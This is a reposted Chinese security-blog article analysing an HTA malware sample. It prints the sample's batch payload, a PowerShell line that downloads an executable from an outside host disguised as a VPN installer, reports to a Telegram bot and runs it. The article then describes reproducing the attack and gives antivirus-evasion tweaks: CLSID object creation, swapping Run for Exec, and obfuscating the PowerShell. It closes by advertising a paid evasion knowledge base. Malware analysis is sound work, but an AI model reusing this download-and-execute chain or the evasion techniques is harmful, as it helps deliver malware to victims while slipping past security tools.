Hta恶意样本分析

admin
admin
admin
0
文章
0
评论
2026-04-16 04:40:02 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文分析了一个Hta恶意样本的运行机制,该样本通过CreateObject创建Shell对象获取临时路径,利用Powershell下载恶意文件并执行。作者提出了免杀改进方案,包括使用CLSID替代CreateObject、将Run方法替换为Exec方法、混淆Powershell命令等。文档强调技术仅用于网络安全学习,末尾推广免杀知识库。 综合评分: 70 文章分类: 恶意软件,免杀,代码审计,渗透测试,安全工具

cover_image

Hta恶意样本分析

原创

kernel kernel

Relay学安全

2026年3月25日 17:09 日本

在小说阅读器读本章

去阅读

免责声明

本文所有内容仅供网络安全学习与研究之用,旨在提升安全意识、探讨防御技术。读者必须承诺并保证仅将所述知识用于合法、授权的环境。

严禁任何个人或组织将本文提及的任何技术、方法或工具用于任何非法入侵、破坏、窃取数据等恶意活动。由此产生的任何直接或间接法律责任及后果均由行为人自行承担,与本文作者及发布平台无关。

作者力求内容准确,但技术发展迅速,本文不提供任何明示或暗示的担保。读者应在模拟环境或已获得明确授权的目标中进行实践。

该样本的Hash如下:

SHA256 hash:     2c7a99f137efd718f89cf8b260379c99af89ea1939568df09314918f2c5999a3SHA3-384 hash:    4a6f07bb97900c992a552ba734cca843d4ec6667e4ac6507e588bed860d3c2d250519df8e29f705cfbd24295b942003fSHA1 hash:    8ffb47c2eb9f76ed7a0f8a68d2019c11a4bba291MD5 hash:     d7390ef13c119daedf2350978786696f

大家可执行搜索下载该样本。首先该样本是一个Hta文件。

首先它将通过CreateObject来创建文件系统对象和Shell对象,然后调用Shell对象的ExpandEnvironmentStrings方法来获取到用户的临时文件夹路径,其实也就是C:\Users\用户名\AppData\Local\Temp

下一步则是定义你的Tel** API密钥,这个密钥你可以通过创建机器人来获取到。

后续则是定义下载的恶意文件链接。然后将其Powershell命令写入到runexe.bat文件中,最后执行该bat文件。

bat文件中的内容如下:

@echo offpowershell -Command "(New-Object Net.WebClient).DownloadFile('https://zynaris.io/InstallMullvadVPN.exe', 'C:\Users\29273\AppData\Local\Temp\WebEx_Client.exe')"powershell -Command "Invoke-WebRequest -Uri 'https://api.telegram.org/xxxxxx/sendMessage?chat_id=xxxxx&text=Starting%20WebEx_Client.exe' -UseBasicParsing""C:\Users\29273\AppData\Local\Temp\WebEx_Client.exe"

该bat文件主要有3个功能,分别是下载InstallMullvadVPN.exe文件,将其写入到Temp目录下重命名为WebEx_Client.exe

后续当下载文件完成后,它会通过Invoke-WebRequest告诉机器人有人已经下载文件了,作为一个提示。

后续直接执行下载的文件。

这里简单的复现一下,首先我们需要替换其机器人的API密钥和ID。这一步自行问AI。

后续我们创建一个简单的MessageBoxA弹框的一个程序来充当恶意程序。

将其中的urls数组中的值替换为自己的地址即可。

现在我们来运行一下,成功执行,且在机器人这里收到消息。

现在来思考一个问题,它这个样本我们怎么样才能给他简单改改?有那些地方是可以改改的。

首先该样本是通过CreateObject来获取到Shell对象和文件系统对象。但是现在VBS这种获取方式是很容易被查杀的。

这里可以更改为通过CLSID的方式来创建 这可以借用OleView工具查看CLSID。例如: GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")

所以这意味着可以改为:

那么还可以改哪里?比如说这里的调用了Shell对象的Run方法来执行,那么是否有替代品呢?

我们可以看到如下图中的Run方法和Exec方法,我们可以看到这两个方法其实本质上都是去执行命令的,这意味着我们可以将Run方法替换为Exec方法。

在Exec方法这里我们可以尝试的去执行一条命令,没有任何问题。

可以看到也是可以正常执行的。

包括下载文件哪里我们也可以对其Powershell命令来进行混淆。这里大家可以自由发挥。

内部知识库详情介绍

经过长时间的编写文档,这里建立了一个免杀学习的内部知识库。

在这里我们当脚本小子,只探究原理,能让你真正的从0到1学习免杀相关知识。

如有需要请加V:

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Relay学安全 kernel kernel《Hta恶意样本分析》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
Hta恶意样本分析 网络安全文章

Hta恶意样本分析

文章总结: 本文分析了一个Hta恶意样本的运行机制,该样本通过CreateObject创建Shell对象获取临时路径,利用Powershell下载恶意文件并执行
04-160 评论
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0